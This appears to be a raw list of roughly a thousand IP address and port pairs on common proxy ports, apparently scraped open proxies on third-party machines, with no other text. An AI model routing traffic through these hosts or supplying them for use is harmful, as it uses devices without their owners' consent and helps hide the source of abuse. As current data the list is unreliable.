117.174.206.166:8123 117.174.206.30:8123 117.174.207.54:8123 117.174.208.147:8123 117.174.216.180:8123 117.174.217.155:8123 117.174.22.88:8123 117.174.225.49:8123 117.174.237.128:8123 117.174.3.177:8123 117.175.102.140:8123 117.175.102.152:8123 117.175.102.167:8123 117.175.108.190:8123 117.175.108.30:8123 117.175.109.150:8123 117.175.109.200:8123 117.175.11.246:8123 117.175.110.168:8123 117.175.110.239:8123 117.175.111.200:8123 117.175.111.211:8123 117.175.111.38:8123 117.175.111.56:8123 117.175.116.128:8123 117.175.116.43:8123 117.175.117.136:8123 117.175.117.186:8123 117.175.119.182:8123 117.175.121.26:8123 117.175.124.32:8123 117.175.125.137:8123 117.175.125.195:8123 117.175.125.38:8123 117.175.192.35:8123 117.175.197.208:8123 117.175.198.97:8123 117.175.200.181:8123 117.175.213.236:8123 117.175.226.168:8123 117.175.226.199:8123 117.175.227.143:8123 117.175.227.147:8123 117.175.227.242:8123 117.175.227.7:8123 117.175.228.237:8123 117.175.228.80:8123 117.175.229.154:8123 117.175.229.192:8123 117.175.229.242:8123 117.175.229.4:8123 117.175.230.125:8123 117.175.230.19:8123 117.175.230.224:8123 117.175.231.103:8123 117.175.231.48:8123 117.175.231.5:8123 117.175.232.109:8123 117.175.232.240:8123 117.175.232.76:8123 117.175.237.90:8123 117.175.238.85:8123 117.175.241.119:8123 117.175.241.37:8123 117.175.242.114:8123 117.175.242.213:8123 117.175.243.178:8123 117.175.243.186:8123 117.175.243.42:8123 117.175.243.49:8123 117.175.243.73:8123 117.175.33.168:8123 117.175.33.73:8123 117.175.34.3:8123 117.175.36.42:8123 117.175.37.33:8123 117.175.39.4:8123 117.175.48.80:8123 117.175.51.120:8123 117.175.60.135:8123 117.175.60.56:8123 117.175.60.74:8123 117.175.61.200:8123 117.175.62.114:8123 117.175.62.182:8123 117.175.9.217:8123 117.175.99.182:8123 117.176.10.251:8123 117.176.105.218:8123 117.176.109.253:8123 117.176.11.220:8123 117.176.11.243:8123 117.176.110.115:8123 117.176.110.187:8123 117.176.164.18:8123 117.176.185.128:8123 117.176.187.114:8123 117.176.188.128:8123 117.176.189.185:8123 117.176.189.231:8123 117.176.189.47:8123 117.176.189.48:8123 117.176.189.90:8123 117.176.191.10:8123 117.176.191.142:8123 117.176.191.182:8123 117.176.191.234:8123 117.176.2.251:8123 117.176.221.107:8123 117.176.221.234:8123 117.176.221.63:8123 117.176.234.13:8123 117.176.234.231:8123 117.176.28.236:8123 117.176.28.49:8123 117.176.29.190:8123 117.176.29.250:8123 117.176.3.218:8123 117.176.32.224:8123 117.176.33.176:8123 117.176.39.45:8123 117.176.4.245:8123 117.176.42.181:8123 117.176.8.44:8123 117.177.16.189:8123 117.177.161.37:8123 117.177.164.147:8123 117.177.166.27:8123 117.177.167.119:8123 117.177.167.70:8123 117.177.170.110:8123 117.177.170.14:8123 117.177.170.26:8123 117.177.171.87:8123 117.177.172.129:8123 117.177.172.193:8123 117.177.174.231:8123 117.177.174.30:8123 117.177.232.51:8123 117.177.232.60:8123 117.177.233.94:8123 117.177.240.43:80 117.177.242.146:80 117.177.243.7:80 117.177.28.217:8123 117.177.44.185:8123 117.177.45.101:8123 117.177.45.193:8123 117.177.46.167:8123 117.194.100.156:9064 117.194.100.58:9064 117.194.202.255:9064 117.194.209.146:9064 117.194.219.148:9064 117.194.231.57:9064 117.194.254.151:9064 117.194.45.226:9064 117.194.7.28:9064 117.195.208.255:9064 117.195.71.184:9064 117.200.237.142:9064 117.200.38.41:9064 117.200.74.28:9064 117.200.79.118:9064 117.201.101.56:9064 117.201.160.253:9064 117.203.11.46:9064 117.204.68.86:9064 117.207.187.73:9064 117.208.0.33:9064 117.208.178.5:9064 117.208.63.137:9064 117.21.192.10:80 117.21.192.8:80 117.21.192.9:80 117.212.30.196:9064 117.212.76.56:9064 117.213.164.206:9064 117.213.196.226:9064 117.217.106.217:9064 117.217.55.217:9064 117.220.248.233:9064 117.220.249.125:9064 117.222.215.125:9064 117.223.18.248:9064 117.239.2.116:3128 117.247.58.24:9064 117.252.5.150:9064 117.252.68.72:9064 117.252.70.141:9064 117.254.230.125:9064 117.254.237.214:9064 117.254.31.140:9064 117.254.52.71:9064 117.81.164.151:8118 117.84.14.158:8118 118.114.58.22:8118 118.114.60.229:8118 118.126.142.209:3128 118.144.151.145:3128 118.144.50.254:3128 118.160.195.74:8088 118.160.210.230:9064 118.160.77.174:9064 118.161.167.137:8088 118.161.55.84:8088 118.165.0.49:8088 118.165.131.159:9064 118.165.145.86:8088 118.166.126.33:8088 118.166.157.113:8088 118.166.84.224:8088 118.169.51.133:9064 118.170.57.16:9064 118.170.96.117:9064 118.171.117.84:9064 118.172.150.235:9064 118.231.65.238:9064 118.233.113.37:9064 118.233.16.26:9064 118.233.201.84:9064 118.233.47.80:9064 118.244.213.6:3128 118.251.174.252:8118 118.67.120.96:80 118.69.202.103:3128 118.69.202.73:3128 118.77.82.224:8118 118.97.118.227:8080 118.97.140.130:80 118.97.184.60:8080 118.97.20.60:8080 118.97.95.182:8080 119.109.92.249:18186 119.137.2.156:3128 119.39.37.203:3128 119.40.98.26:8080 119.6.144.78:81 119.6.144.78:82 119.80.160.50:80 119.81.158.42:3128 119.82.86.51:9064 119.86.235.196:8118 119.87.178.81:3128 119.90.127.2:80 119.90.127.4:80 119.96.234.153:8090 119.96.234.233:8090 119.96.234.236:8090 119.96.246.156:8118 119.97.164.48:8085 119.99.116.57:8118 120.131.128.210:80 120.131.128.214:80 120.131.128.215:80 120.193.146.95:83 120.197.234.166:80 120.197.53.195:8080 120.199.241.115:8123 120.202.249.230:80 120.203.153.144:8123 120.203.153.153:8123 120.203.158.168:8123 120.203.161.8:8123 120.203.162.91:8123 120.203.165.188:8123 120.203.170.189:8123 120.203.170.62:8123 120.203.231.210:8123 120.203.233.179:8123 120.203.233.82:8123 120.203.235.74:8123 120.203.236.91:8123 120.203.239.162:8123 120.203.239.210:8123 120.203.240.151:8123 120.206.102.155:8123 120.206.104.18:8123 120.206.133.130:8123 120.206.136.110:8123 120.206.136.78:8123 120.206.143.45:8123 120.206.144.132:8123 120.206.146.113:8123 120.206.146.79:8123 120.206.150.61:8123 120.206.150.67:8123 120.206.169.19:8123 120.206.174.84:8123 120.206.177.17:8123 120.206.180.41:8123 120.206.182.49:8123 120.206.186.75:8123 120.206.187.101:8123 120.206.187.77:8123 120.206.188.230:8123 120.206.190.225:8123 120.206.196.112:8123 120.206.196.59:8123 120.206.207.119:8123 120.206.214.161:8123 120.206.228.196:8123 120.206.72.134:8123 120.206.72.153:8123 120.206.72.198:8123 120.206.73.150:8123 120.206.73.18:8123 120.206.73.220:8123 120.206.73.87:8123 120.206.76.141:8123 120.206.78.235:8123 120.24.216.244:80 120.27.54.137:3128 120.29.152.86:8080 120.35.60.122:18186 120.50.20.213:9064 120.83.5.164:18000 120.88.37.133:9064 121.12.167.197:3128 121.14.138.56:81 121.224.151.136:18186 121.224.215.34:18186 121.227.46.244:18186 121.231.129.41:8118 121.236.199.119:18186 121.237.194.183:8118 121.31.5.187:8080 121.40.93.229:3128 121.42.146.187:80 121.42.47.182:8080 121.52.250.71:3128 122.118.183.140:9064 122.118.67.139:9064 122.121.108.242:9064 122.121.121.192:9064 122.121.33.126:9064 122.144.130.11:3128 122.146.195.232:3128 122.225.106.35:80 122.225.106.36:80 122.225.106.40:80 122.226.183.48:80 122.233.4.234:8118 122.244.7.81:18186 122.50.133.157:9064 123.110.140.113:9064 123.110.173.49:9064 123.110.217.10:9064 123.110.63.88:8088 123.114.164.35:8118 123.118.148.123:8118 123.118.158.236:8118 123.119.160.255:8118 123.119.169.234:9000 123.119.171.235:9000 123.119.180.223:9000 123.120.61.216:9000 123.121.113.172:8118 123.123.20.228:8118 123.125.122.58:80 123.125.19.44:80 123.152.86.98:8585 123.163.125.3:9000 123.163.97.252:8118 123.165.125.86:8118 123.200.11.213:8080 123.201.125.201:9064 123.205.115.85:8088 123.205.127.162:8088 123.231.225.159:8080 123.236.53.113:9064 123.236.62.158:9064 123.238.108.183:9064 123.238.120.255:9064 123.56.93.243:3128 124.11.174.202:9064 124.11.196.232:9064 124.118.2.79:8118 124.12.51.210:9064 124.123.69.51:9064 124.125.19.169:9064 124.125.29.156:9064 124.127.204.249:8080 124.131.180.133:8585 124.161.94.8:80 124.192.148.14:8080 124.192.167.1:8118 124.200.185.102:8118 124.202.221.26:8118 124.207.175.91:8080 124.229.43.195:8118 124.248.177.17:8080 124.6.135.170:3128 124.88.67.10:80 125.163.230.154:80 125.224.115.141:9064 125.230.155.126:9064 125.231.80.132:9064 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.69:80 125.47.67.35:8118 125.63.106.168:9064 125.81.229.221:18186 125.83.108.42:8118 125.83.214.69:8118 125.88.255.144:80 125.99.183.9:9064 129.10.89.208:3128 130.0.25.1:3128 130.0.25.110:3128 130.14.29.110:80 130.14.29.111:80 139.0.25.146:8080 14.106.73.111:8585 14.140.202.90:3128 14.18.16.67:80 14.207.102.103:9064 14.218.177.202:9999 14.220.74.81:8585 14.96.195.83:9064 14.96.70.123:9064 14.97.118.74:9064 14.97.128.72:9064 14.97.175.145:9064 14.97.212.160:9064 14.97.216.116:9064 14.97.240.149:9064 14.97.77.226:9064 14.97.9.139:9064 14.98.119.213:9064 14.98.13.31:9064 14.98.15.200:9064 14.98.169.31:9064 14.98.193.119:9064 14.98.51.248:9064 14.98.89.49:9064 14.98.99.88:9064 14.99.128.147:9064 14.99.147.165:9064 14.99.17.108:9064 14.99.171.2:9064 14.99.216.139:9064 14.99.53.15:9064 14.99.69.120:9064 140.115.214.175:9064 140.123.236.217:9064 143.89.225.246:3128 159.8.36.242:3128 162.243.106.177:3128 162.246.23.9:3128 163.177.79.4:80 163.177.79.5:80 163.27.167.124:9064 163.53.187.106:8080 164.100.222.80:80 164.138.237.252:8080 166.78.162.23:3128 168.187.70.155:3128 171.105.194.84:80 171.105.196.122:80 171.113.125.105:18186 171.9.4.66:8585 171.96.16.5:9064 171.97.210.129:9064 173.201.183.172:8000 173.209.49.155:3128 173.239.14.54:80 173.239.14.59:80 173.239.17.187:80 174.34.166.10:3128 175.1.135.12:80 175.100.182.170:9064 175.106.18.218:8080 175.111.34.36:9064 175.138.47.185:8080 175.149.110.185:80 175.182.169.217:9064 175.182.202.7:9064 176.103.170.56:8081 176.199.92.204:8080 177.101.9.75:9064 177.12.180.24:9064 177.12.52.168:8080 177.129.215.6:9064 177.157.106.21:8080 177.179.15.245:8080 177.183.225.28:9064 177.184.198.1:8080 177.188.28.22:9064 177.189.117.60:9064 177.206.43.197:8080 177.21.227.133:8080 177.21.238.94:8080 177.221.42.41:3128 177.234.2.182:8080 177.36.214.210:8080 177.36.214.222:8080 177.39.247.162:9064 177.43.109.171:8080 177.44.2.96:9064 177.45.174.214:9064 177.45.197.108:9064 177.52.245.109:9064 177.54.243.26:8080 177.6.3.85:9064 177.6.87.54:8080 177.66.146.41:8080 177.69.67.242:3128 177.69.67.245:3128 177.69.67.247:3128 177.73.14.183:9064 177.8.200.214:9064 177.95.217.134:9064 177.97.63.32:8080 178.205.97.68:8080 178.33.34.48:3128 178.62.187.138:8080 178.62.75.222:3128 178.74.68.74:8080 179.111.124.12:9064 179.165.220.39:9064 179.168.197.235:9064 179.176.11.117:8080 179.185.66.146:3128 179.186.104.59:8080 179.230.26.205:9064 179.56.93.155:9064 179.57.221.54:9064 180.107.6.154:8585 180.109.88.188:8118 180.111.186.181:8118 180.140.103.150:8585 180.148.58.212:9064 180.148.62.45:9064 180.153.100.242:80 180.153.100.242:81 180.153.100.242:82 180.153.100.242:84 180.153.100.242:86 180.177.53.215:9064 180.183.103.84:3128 180.183.108.47:3128 180.183.135.205:3128 180.183.137.236:3128 180.183.47.87:3128 180.188.226.239:9064 180.211.180.17:8888 180.215.115.82:9064 180.215.17.136:9064 180.215.208.78:9064 180.215.52.199:9064 180.215.66.120:9064 180.215.9.42:9064 180.244.102.174:3128 180.246.103.221:9064 180.247.133.59:8080 180.248.21.87:3128 180.250.160.181:8080 180.250.73.50:9064 180.253.148.206:8080 180.76.146.12:3128 181.208.184.57:9064 181.208.37.65:9064 181.208.99.27:8080 181.211.191.227:8080 181.226.188.102:9064 181.29.13.139:9064 181.43.105.14:9064 181.49.15.162:3128 181.65.50.104:3128 181.72.118.179:9064 181.72.230.123:9064 182.109.92.183:8123 182.118.31.110:80 182.234.215.69:8088 182.235.246.232:9064 182.237.161.255:9064 182.239.95.136:80 182.239.95.137:80 182.239.95.139:80 182.253.32.108:8080 182.253.32.66:3128 182.253.34.179:8080 182.253.72.112:8080 182.254.129.68:80 182.30.249.45:8080 182.48.207.40:9064 182.48.249.101:9064 182.93.228.150:8080 182.93.83.101:8080 182.96.133.93:18186 183.129.161.28:3128 183.129.194.87:3128 183.14.23.113:8118 183.179.118.59:9064 183.203.208.162:8118 183.203.208.166:8118 183.203.208.179:8118 183.203.22.182:80 183.203.22.182:85 183.203.22.183:80 183.203.22.183:85 183.203.22.184:80 183.203.22.184:85 183.203.22.185:80 183.203.22.185:85 183.203.8.147:8080 183.203.8.148:8080 183.206.71.27:8123 183.206.72.52:8123 183.206.73.62:8123 183.206.74.253:8123 183.206.76.130:8123 183.206.87.10:8123 183.206.87.85:8123 183.206.88.33:8123 183.207.229.137:6969 183.207.229.137:7070 183.207.229.137:80 183.207.229.137:8000 183.207.229.137:8001 183.207.229.137:8080 183.207.229.137:9001 183.207.229.137:9090 183.207.229.137:9999 183.207.229.138:6969 183.207.229.138:7070 183.207.229.138:80 183.207.229.138:8080 183.207.229.138:8089 183.207.229.138:8090 183.207.229.138:818 183.207.229.138:8888 183.207.229.138:9090 183.207.229.196:80 183.207.229.196:8080 183.207.229.196:8888 183.207.229.196:9090 183.207.229.196:9999 183.207.237.11:80 183.208.214.200:8123 183.208.217.38:8123 183.208.222.143:8123 183.208.32.165:8123 183.208.59.239:8123 183.209.107.212:8123 183.209.111.190:8123 183.209.187.72:8123 183.209.236.220:8123 183.210.0.172:8123 183.210.1.59:8123 183.210.13.125:8123 183.210.251.145:8123 183.210.253.98:8123 183.210.98.241:8123 183.211.31.184:8123 183.211.73.120:8123 183.211.73.203:8123 183.211.73.36:8123 183.211.77.103:8123 183.211.83.180:8123 183.212.113.225:8123 183.212.114.163:8123 183.212.12.171:8123 183.212.12.247:8123 183.212.123.227:8123 183.212.153.84:8123 183.212.67.153:8123 183.213.146.180:8123 183.213.159.192:8123 183.216.106.1:8123 183.216.127.168:8123 183.216.161.157:8123 183.216.163.219:8123 183.216.163.93:8123 183.216.164.53:8123 183.216.165.186:8123 183.216.165.205:8123 183.216.165.84:8123 183.216.166.78:8123 183.216.171.225:8123 183.216.172.121:8123 183.216.172.233:8123 183.216.173.44:8123 183.216.175.42:8123 183.216.178.202:8123 183.216.180.220:8123 183.216.185.186:8123 183.216.187.39:8123 183.216.188.209:8123 183.216.224.244:8123 183.216.225.2:8123 183.216.230.151:8123 183.216.232.3:8123 183.216.234.142:8123 183.216.239.143:8123 183.216.239.171:8123 183.216.239.18:8123 183.216.239.45:8123 183.216.240.180:8123 183.216.242.178:8123 183.216.243.2:8123 183.216.245.45:8123 183.216.246.207:8123 183.216.248.27:8123 183.216.248.28:8123 183.216.251.24:8123 183.216.252.232:8123 183.216.253.82:8123 183.216.99.71:8123 183.217.118.24:8123 183.217.118.31:8123 183.217.137.233:8123 183.217.176.20:8123 183.217.186.123:8123 183.217.187.2:8123 183.217.188.201:8123 183.217.188.93:8123 183.217.194.140:8123 183.217.195.108:8123 183.217.197.167:8123 183.217.197.35:8123 183.217.198.159:8123 183.217.207.191:8123 183.217.212.14:8123 183.217.228.23:8123 183.217.228.42:8123 183.217.232.112:8123 183.217.240.113:8123 183.217.243.21:8123 183.217.31.206:8123 183.217.43.219:8123 183.217.62.150:8123 183.217.66.91:8123 183.217.96.79:8123 183.218.106.154:8123 183.218.13.175:8123 183.218.48.225:8123 183.218.86.239:8123 183.218.87.28:8123 183.218.89.113:8123 183.219.102.248:8123 183.219.102.46:8123 183.219.138.73:8123 183.219.140.140:8123 183.219.141.219:8123 183.219.144.138:8123 183.219.144.206:8123 183.219.146.105:8123 183.219.147.192:8123 183.219.149.59:8123 183.219.150.119:8123 183.219.150.175:8123 183.219.152.217:8123 183.219.154.250:8123 183.219.155.196:8123 183.219.156.124:8123 183.219.157.176:8123 183.219.158.243:8123 183.219.158.49:8123 183.219.160.95:8123 183.219.163.70:8123 183.219.168.128:8123 183.219.174.112:8123 183.219.174.142:8123 183.219.248.92:8123 183.219.27.26:8123 183.219.28.110:8123 183.219.28.240:8123 183.219.3.157:8123 183.219.3.210:8123 183.219.30.172:8123 183.219.32.32:8123 183.219.4.231:8123 183.219.46.154:8123 183.219.50.132:8123 183.219.50.52:8123 183.219.50.58:8123 183.219.52.31:8123 183.219.55.106:8123 183.219.58.123:8123 183.219.58.241:8123 183.219.59.114:8123 183.219.67.157:8123 183.219.7.243:8123 183.219.82.120:8123 183.219.82.136:8123 183.219.84.50:8123 183.219.87.114:8123 183.219.88.60:8123 183.219.89.96:8123 183.219.91.227:8123 183.219.91.97:8123 183.219.92.230:8123 183.219.93.10:8123 183.219.93.196:8123 183.219.94.114:8123 183.219.94.253:8123 183.220.240.149:8123 183.221.160.38:8123 183.222.156.150:8123 183.222.171.215:8123 183.222.250.121:8123 183.222.252.243:8123 183.223.10.50:8123 183.223.15.7:8123 183.223.170.8:8123 183.223.172.230:8123 183.223.192.147:8123 183.223.192.95:8123 183.223.194.27:8123 183.223.194.6:8123 183.223.195.130:8123 183.223.196.184:8123 183.223.197.197:8123 183.223.197.2:8123 183.223.197.249:8123 183.223.197.253:8123 183.223.198.163:8123 183.223.200.61:8123 183.223.201.171:8123 183.223.201.188:8123 183.223.204.13:8123 183.223.204.217:8123 183.223.208.238:8123 183.223.211.34:8123 183.223.215.210:8123 183.223.242.126:8123 183.223.243.55:8123 183.223.33.125:8123 183.223.34.154:8123 183.223.36.35:8123 183.223.40.126:8123 183.223.40.243:8123 183.223.9.11:8123 183.224.1.30:80 183.224.99.148:8123 183.227.216.80:8123 183.227.217.139:8123 183.227.217.19:8123 183.227.219.83:8123 183.228.109.119:8123 183.228.109.23:8123 183.228.109.39:8123 183.228.11.204:8123 183.228.123.214:8123 183.228.139.29:8123 183.228.156.160:8123 183.228.156.6:8123 183.228.177.44:8123 183.228.183.117:8123 183.228.198.184:8123 183.228.201.184:8123 183.228.74.239:8123 183.230.53.45:8123 183.230.53.62:8123 183.230.53.65:8123 183.31.218.177:9999 183.57.78.61:8085 183.60.109.210:8888 183.60.109.23:8888 183.60.109.41:8888 183.60.187.55:80 183.60.44.136:88 183.62.172.50:9999 183.66.79.93:8118 183.69.177.49:80 183.70.34.76:8118 183.82.90.133:9064 183.83.115.161:9064 183.83.176.151:9064 183.83.251.206:9064 183.87.231.166:9064 183.89.72.30:3128 183.89.74.140:3128 183.95.152.141:80 183.95.152.141:8080 183.95.152.141:8091 184.168.134.219:80 185.28.193.95:8080 185.30.147.197:8080 185.37.226.106:19350 185.37.226.184:18080 185.37.226.184:19350 185.72.156.19:7808 186.101.82.74:3128 186.109.91.3:8080 186.138.66.241:8080 186.14.55.28:9064 186.188.123.90:9064 186.188.125.108:9064 186.206.227.138:8080 186.213.197.74:8080 186.214.137.76:8080 186.214.147.241:8080 186.215.80.218:3128 186.215.80.219:3128 186.227.164.142:9064 186.232.160.42:8080 186.244.53.48:8080 186.67.97.35:8081 186.88.1.45:8080 186.88.103.118:8080 186.88.110.3:8080 186.88.164.186:9064 186.88.168.27:9064 186.88.168.38:9064 186.88.170.194:9064 186.88.172.97:8080 186.88.182.129:8080 186.88.210.44:9064 186.88.230.126:8080 186.88.231.104:9064 186.88.231.48:8080 186.88.232.71:8080 186.88.241.240:8080 186.88.244.153:8080 186.88.250.217:9064 186.88.3.105:9064 186.88.33.35:9064 186.88.37.106:8080 186.88.40.252:8080 186.88.42.109:8080 186.88.87.210:9064 186.88.88.200:8080 186.88.92.166:9064 186.88.93.160:9064 186.89.114.171:9064 186.89.114.200:9064 186.89.116.53:8080 186.89.120.15:8080 186.89.125.213:9064 186.89.148.140:8080 186.89.16.157:8080 186.89.16.67:9064 186.89.179.17:8080 186.89.187.155:8080 186.89.190.164:8080 186.89.213.189:9064 186.89.217.106:9064 186.89.220.192:8080 186.89.221.208:9064 186.89.222.230:8080 186.89.23.172:9064 186.89.242.5:8080 186.89.246.243:8080 186.89.255.32:8080 186.89.27.47:8080 186.89.55.37:8080 186.89.85.147:9064 186.89.86.120:9064 186.89.87.57:8080 186.89.98.246:8080 186.9.108.3:9064 186.90.101.243:8080 186.90.108.139:9064 186.90.114.254:8080 186.90.116.128:8080 186.90.121.242:8080 186.90.123.161:9064 186.90.148.78:8080 186.90.155.21:9064 186.90.243.229:8080 186.90.255.249:9064 186.90.28.228:9064 186.90.59.134:9064 186.90.72.49:9064 186.90.82.177:9064 186.90.86.181:9064 186.90.88.98:9064 186.91.126.18:9064 186.91.126.247:8080 186.91.129.223:9064 186.91.134.100:9064 186.91.160.55:9064 186.91.166.69:9064 186.91.199.71:9064 186.91.205.169:9064 186.91.207.83:9064 186.91.226.254:9064 186.91.233.41:8080 186.91.235.205:8080 186.91.238.60:8080 186.91.243.197:9064 186.91.250.8:8080 186.91.251.149:8080 186.91.251.55:8080 186.91.44.228:8080 186.91.63.240:9064 186.91.64.42:8080 186.91.65.22:9064 186.91.70.17:8080 186.91.78.232:8080 186.91.93.7:9064 186.91.94.244:8080 186.92.113.36:9064 186.92.118.8:9064 186.92.128.8:8080 186.92.130.154:9064 186.92.152.23:8080 186.92.163.27:8080 186.92.185.206:8080 186.92.188.130:9064 186.92.190.62:8080 186.92.218.129:8080 186.92.23.113:8080 186.92.24.186:8080 186.92.240.48:8080 186.92.248.120:8080 186.92.25.16:9064 186.92.34.210:8080 186.92.52.50:9064 186.92.53.253:8080 186.92.57.190:8080 186.92.70.9:8080 186.92.82.152:8080 186.92.87.41:9064 186.92.94.140:9064 186.92.94.5:8080 186.93.105.173:8080 186.93.109.17:8080 186.93.111.219:8080 186.93.121.187:8080 186.93.124.133:8080 186.93.129.108:8080 186.93.168.93:8080 186.93.171.28:8080 186.93.172.6:8080 186.93.186.198:8080 186.93.193.70:9064 186.93.195.153:8080 186.93.195.164:8080 186.93.221.111:8080 186.93.231.240:8080 186.93.235.237:9064 186.93.239.159:9064 186.93.249.161:8080 186.93.25.57:8080 186.94.112.178:9064 186.94.117.60:9064 186.94.119.250:9064 186.94.134.72:8080 186.94.148.138:8080 186.94.148.171:8080 186.94.148.217:9064 186.94.163.47:8080 186.94.179.142:8080 186.94.179.72:9064 186.94.186.135:9064 186.94.19.131:9064 186.94.20.132:9064 186.94.219.208:9064 186.94.232.7:9064 186.94.237.186:8080 186.94.24.239:9064 186.94.250.31:9064 186.94.26.73:8080 186.94.30.196:9064 186.94.31.12:9064 186.94.32.212:9064 186.94.36.151:8080 186.94.48.11:9064 186.94.49.218:9064 186.94.54.214:8080 186.94.56.59:9064 186.94.57.101:8080 186.94.65.111:8080 186.94.82.65:8080 186.95.0.113:9064 186.95.108.34:8080 186.95.12.35:9064 186.95.134.251:8080 186.95.137.11:9064 186.95.15.233:9064 186.95.18.191:8080 186.95.183.129:8080 186.95.190.71:8080 186.95.2.225:9064 186.95.210.247:8080 186.95.213.251:8080 186.95.225.10:9064 186.95.230.106:8080 186.95.235.184:8080 186.95.239.215:9064 186.95.243.244:8080 186.95.244.164:9064 186.95.34.212:8080 186.95.47.128:8080 186.95.48.248:9064 186.95.69.202:8080 186.95.82.223:9064 186.95.83.201:8080 186.95.86.21:8080 186.95.87.159:8080 186.95.9.177:9064 187.113.21.188:9064 187.120.34.25:3128 187.122.166.154:9064 187.14.200.174:8080 187.157.45.114:8080 187.16.44.228:8080 187.189.45.128:8080 187.20.209.49:9064 187.36.195.26:9064 187.44.14.156:8080 187.44.158.206:8080 187.45.63.253:8080 187.53.35.105:8080 187.54.122.66:8080 187.57.209.30:9064 187.60.142.156:8080 187.61.215.127:8080 187.63.204.177:9064 187.70.162.193:9064 187.74.160.179:9064 187.74.193.202:9064 187.74.2.62:9064 187.74.92.138:9064 187.75.147.132:3128 187.75.166.80:3130 187.78.24.207:9064 187.86.20.34:8080 187.91.90.242:9064 188.132.226.2:80 188.137.99.6:3128 188.226.145.143:3128 188.40.147.101:2020 189.13.118.92:8080 189.17.66.162:8080 189.201.241.233:8080 189.29.125.192:9064 189.35.43.234:9064 189.39.139.247:9064 189.58.248.110:3128 189.68.124.46:9064 189.69.120.216:9064 189.69.80.63:9064 189.7.98.74:9064 189.73.224.190:8080 189.79.171.201:9064 189.85.29.110:8080 190.0.241.86:80 190.0.241.86:8080 190.104.157.71:3128 190.109.177.229:80 190.12.86.211:3128 190.12.86.213:3128 190.121.148.192:8080 190.121.148.242:8080 190.121.230.148:8080 190.123.187.189:9064 190.136.1.7:8080 190.140.172.164:80 190.142.143.135:9064 190.153.38.152:8080 190.183.48.233:9064 190.198.121.130:8080 190.198.134.191:8080 190.198.139.166:9064 190.198.147.171:8080 190.198.148.134:8080 190.198.150.187:8080 190.198.154.248:8080 190.198.155.226:8080 190.198.16.48:8080 190.198.176.158:9064 190.198.177.232:8080 190.198.181.161:8080 190.198.186.61:8080 190.198.191.164:8080 190.198.22.20:8080 190.198.229.171:8080 190.198.238.142:8080 190.198.246.235:9064 190.198.251.164:8080 190.198.254.72:9064 190.198.29.63:9064 190.198.70.88:9064 190.198.88.131:9064 190.198.93.12:8080 190.198.93.124:8080 190.198.94.215:8080 190.199.195.109:8080 190.199.196.229:9064 190.199.199.185:9064 190.199.217.96:8080 190.199.248.164:8080 190.199.250.219:9064 190.199.41.123:8080 190.199.44.94:9064 190.199.57.66:8080 190.199.59.235:8080 190.199.60.16:8080 190.199.88.195:8080 190.199.91.205:8080 190.199.93.235:9064 190.199.94.215:8080 190.200.134.248:8080 190.200.151.137:9064 190.200.157.182:8080 190.200.208.154:8080 190.200.21.181:9064 190.200.24.38:8080 190.200.25.132:8080 190.200.31.141:8080 190.200.31.224:8080 190.201.100.130:9064 190.201.100.20:8080 190.201.107.108:9064 190.201.107.76:8080 190.201.108.5:9064 190.201.108.80:9064 190.201.121.15:8080 190.201.123.224:8080 190.201.133.72:8080 190.201.140.139:9064 190.201.164.99:8080 190.201.175.103:8080 190.201.219.33:8080 190.201.43.31:9064 190.201.7.17:9064 190.201.96.198:9064 190.201.96.85:9064 190.202.214.247:9064 190.202.216.116:8080 190.202.217.209:8080 190.202.220.214:8080 190.202.241.165:8080 190.203.128.111:9064 190.203.132.125:9064 190.203.141.15:9064 190.203.146.241:8080 190.203.146.7:8080 190.203.147.36:8080 190.203.162.121:9064 190.203.168.12:8080 190.203.176.160:8080 190.203.245.63:9064 190.203.250.90:8080 190.203.251.245:8080 190.203.251.61:9064 190.203.35.198:9064 190.203.74.120:9064 190.203.97.190:9064 190.204.1.103:9064 190.204.100.201:8080 190.204.103.87:8080 190.204.105.25:9064 190.204.112.201:8080 190.204.129.118:8080 190.204.146.154:8080 190.204.169.126:9064 190.204.173.158:8080 190.204.175.211:9064 190.204.18.154:9064 190.204.224.140:9064 190.204.233.103:8080 190.204.39.28:8080 190.204.42.132:9064 190.204.43.206:9064 190.204.47.130:9064 190.204.51.54:9064 190.204.53.22:8080 190.204.6.7:8080 190.204.66.161:9064 190.204.76.167:8080 190.204.84.222:9064 190.204.94.235:9064 190.204.96.197:9064 190.204.98.145:8080 190.205.115.221:8080 190.205.149.164:8080 190.205.157.253:8080 190.205.224.221:8080 190.205.4.140:8080 190.206.10.37:8080 190.206.11.141:9064 190.206.115.196:8080 190.206.12.16:9064 190.206.141.216:8080 190.206.149.119:9064 190.206.150.124:8080 190.206.157.124:9064 190.206.176.92:9064 190.206.212.108:8080 190.206.222.28:8080 190.206.222.79:8080 190.206.223.218:9064 190.206.235.156:9064 190.206.243.148:8080 190.206.252.76:8080 190.206.45.16:9064 190.206.6.139:8080 190.206.62.194:9064 190.206.85.148:8080 190.206.87.25:9064 190.207.106.98:8080 190.207.129.239:8080 190.207.143.22:9064 190.207.154.146:9064 190.207.154.179:8080 190.207.156.22:8080 190.207.159.95:9064 190.207.172.27:8080 190.207.198.135:9064 190.207.199.228:9064 190.207.207.182:8080 190.207.229.227:8080 190.207.233.54:9064 190.207.234.125:8080 190.207.237.182:9064 190.207.32.47:8080 190.207.69.120:9064 190.233.57.239:8080 190.235.148.218:3128 190.235.61.68:3128 190.36.100.254:9064 190.36.16.173:9064 190.36.216.206:9064 190.36.216.52:9064 190.36.217.126:9064 190.36.23.243:8080 190.36.81.209:9064 190.37.0.247:9064 190.37.0.254:9064 190.37.105.70:9064 190.37.110.135:9064 190.37.160.183:8080 190.37.172.185:8080 190.37.208.84:8080 190.37.35.100:9064 190.37.43.4:9064 190.37.68.231:8080 190.37.69.159:9064 190.37.71.168:9064 190.37.76.72:9064 190.37.79.181:8080 190.37.8.203:8080 190.37.87.20:9064 190.38.16.159:9064 190.38.16.62:9064 190.38.166.155:9064 190.38.179.117:9064 190.38.186.233:8080 190.38.190.77:8080 190.38.220.244:9064 190.38.29.136:9064 190.38.29.32:8080 190.38.32.92:9064 190.38.54.243:9064 190.38.92.73:8080 190.39.118.111:9064 190.39.129.133:9064 190.39.137.78:8080 190.39.151.189:9064 190.39.172.212:8080 190.39.201.66:9064 190.39.202.160:9064 190.39.229.133:9064 190.39.243.49:8080 190.39.85.95:8080 190.72.115.225:8080 190.72.142.151:8080 190.72.153.108:9064 190.72.158.70:8080 190.72.182.187:8080 190.72.185.136:9064 190.72.37.136:8080 190.72.4.216:9064 